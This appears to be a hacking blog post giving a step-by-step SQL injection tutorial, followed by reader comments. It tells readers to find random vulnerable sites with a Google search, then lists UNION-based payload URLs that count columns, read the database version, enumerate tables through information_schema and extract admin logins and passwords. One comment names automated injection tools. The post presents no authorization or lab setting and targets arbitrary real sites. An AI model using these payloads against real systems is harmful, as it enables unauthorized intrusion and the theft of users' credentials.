Home > Hack > How to perform a SQL injection?

How to perform a SQL injection?

First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique  that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.

Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘.  If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.

1. Check the vulnerability by adding ‘ to the above link.

If you get an error message it means that the site is vulnerable to SQL injection.

Now you can be damn sure that the site is vulnerable to SQL injection.

2. Find out the number of columns

To find number of columns we use statement ORDER BY

Just increment the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1– <– no error

http://www.site.com/abc.php?id=5 order by 2– <– no error

http://www.site.com/abc.php?id=5 order by 3– <– no error

http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ‘4’ )

So we can conclude that the table have 4 columns

3. Check whether UNION function works or not

http://www.site.com/abc.php?id=5 union all select 1,2,3–

We will get a number on the screen. Lets say we get the number 2 at this step.

4. Check for MySQL version by replacing 2 in the above step by version()

http://www.site.com/abc.php?id=5 union all select 1,version(),3–

Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.

// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //

5. Use information_schema

Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.

To get tables we use table_name and information_schema.tables

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–

6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.


Categories: Hack Tags: ,
  1. ali
    July 7, 2010 at 2:19 am

    Sql injection tools pangolin liqidis havij jsky safe3 m4x Sqlihelper

  2. July 7, 2010 at 2:50 am

    nice info thx man

  3. August 8, 2010 at 9:39 am

    Nice,it is helpful to me,thanks

  4. prabhat
    December 30, 2010 at 12:51 pm

    document.write(“hello how are u”)

  5. Entropy
    November 28, 2011 at 1:25 am


  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: